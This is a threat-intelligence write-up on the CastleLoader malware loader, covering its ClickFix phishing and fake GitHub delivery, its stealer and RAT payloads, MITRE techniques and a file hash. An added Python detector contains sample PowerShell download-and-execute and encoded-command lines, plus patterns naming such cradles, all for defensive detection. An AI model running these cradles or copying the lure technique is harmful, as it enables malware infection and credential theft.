CastleLoader Targeting US Government Entities

CastleLoader is a modular malware loader that has infected 469 devices since May 2025 by using Cloudflare-themed ClickFix phishing pages and fake GitHub repositories to trick victims into executing malicious PowerShell or installers. It delivers multiple payloads including StealC, RedLine, NetSupport RAT, DeerStealer, HijackLoader, and SectopRAT, and has targeted U.S. government entities. #CastleLoader #StealC #RedLine #NetSupportRAT #DeerStealer #HijackLoader #SectopRAT

Keypoints

  • CastleLoader infected 469 of 1,634 attempted targets (28.7% infection rate) since May 2025.
  • Primary vectors: Cloudflare-themed ClickFix phishing pages prompting PowerShell Run execution and fake GitHub repositories distributing malicious installers.
  • Modular design deploys information stealers (StealC, RedLine, DeerStealer) and RATs/loaders (NetSupport RAT, SectopRAT, HijackLoader).
  • Uses PowerShell and AutoIT scripts to load shellcode in-memory, resolve hashed DLL names/APIs, and connect to seven distinct C2 servers.
  • Operators manage campaigns via a web-based panel with Delivery and Tasks modules, supporting geographic targeting, encrypted Docker payloads, and telemetry collection.
  • Campaigns enforce anti-VM checks, request administrative privileges, and use fake errors/CAPTCHA to social-engineer execution and evade detection.
  • Overlap with DeerStealer campaigns and use of legitimate file-sharing and compromised sites for payload hosting increase resilience and complicate attribution; over 400 critical victims include U.S. government entities.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – used PowerShell commands executed by users via the Windows Run prompt to launch the loader (“…tricking users into copying and executing malicious PowerShell commands via the Windows Run prompt…”).
  • [T1204] User Execution – ClickFix phishing pages and fake GitHub repositories trick users into running installers or scripts (“…lured to fraudulent domains… tricking users into copying and executing malicious PowerShell commands…”).
  • [T1105] Ingress Tool Transfer – secondary payloads are downloaded from legitimate file-sharing services and compromised websites (“…payloads are retrieved from legitimate file-sharing services and compromised websites.”).
  • [T1055] Process Injection – the AutoIT script loads shellcode into memory as a DLL and resolves hashed DLL and API names before executing it in-memory (“…the AutoIT script loads shellcode into memory as a DLL, resolving hashed DLL names and APIs…”).
  • [T1071] Application Layer Protocol – connects to command-and-control servers managed via a web-based panel to send telemetry and receive tasks (“…connect to one of seven distinct C2 servers… provide operators with detailed telemetry…”).
  • [T1497] Virtualization/Sandbox Evasion – campaigns enforce anti-VM detection to avoid analysis (“…Campaigns can enforce administrative privileges, anti-VM detection, and fake error displays to evade detection.”).
  • [T1566] Phishing – Cloudflare-themed ClickFix pages and fake error/CAPTCHA prompts used to social-engineer victims (“…ClickFix phishing technique, often themed around Cloudflare services… display fake error messages or CAPTCHA prompts…”).
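As an added defender-side example (not code from the PolySwarm post), the following constructed Python check flags process-creation events that match the Run-prompt ClickFix pattern described under T1059: PowerShell spawned directly by explorer.exe with a hidden window, an encoded command, or a download-and-execute cradle on its command line. The event fields, sample records, and the placeholder URL are assumptions, not real CastleLoader telemetry.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style, reduced to the
# fields the check needs). Made up for this example, not real CastleLoader telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/verify | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -enc SQBFAFgAIAAoAC4ALgAuACkA"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# A user pasting into the Run prompt (Win+R) yields explorer.exe as the parent process.
RUN_PROMPT_PARENTS = {"explorer.exe"}
# Interpreters ClickFix lures typically instruct the victim to launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Command-line features: hidden window, encoded command, download-and-execute cradle.
SUSPICIOUS = [
    re.compile(r"-(w|win|windowstyle)\s+hidden", re.I),
    re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I),
    re.compile(r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b", re.I),
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the list of reasons this event looks like a ClickFix execution."""
    reasons = []
    if basename(event["ParentImage"]) in RUN_PROMPT_PARENTS and basename(event["Image"]) in INTERPRETERS:
        reasons.append("interpreter launched from explorer.exe (Run prompt)")
        for pattern in SUSPICIOUS:
            if pattern.search(event["CommandLine"]):
                reasons.append("command line matches " + pattern.pattern)
    return reasons

def find_clickfix(events):
    """Return (CommandLine, reasons) for Run-prompt launches that also carry a cradle feature."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= 2:  # explorer.exe as parent alone is normal; require a cradle feature too
            hits.append((ev["CommandLine"], reasons))
    return hits

if __name__ == "__main__":
    for cmd, why in find_clickfix(SAMPLE_EVENTS):
        print(cmd, "->", "; ".join(why))
```

On a real host the same logic applies to Sysmon or Security 4688 events; pairing it with the RunMRU registry key gives a second artifact of what the user actually typed.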

Indicators of Compromise

  • [File Hash] CastleLoader sample – 05ecf871c7382b0c74e5bac267bb5d12446f52368bb1bfe5d2a4200d0f43c1d8
  • [File/Component Names] Secondary payloads delivered – StealC, RedLine, DeerStealer, NetSupport RAT, SectopRAT, HijackLoader
  • [Infrastructure] C2 servers and hosting contexts – seven distinct C2 servers managed via web panel; payloads hosted on legitimate file-sharing services and compromised websites

Read more: https://blog.polyswarm.io/castleloader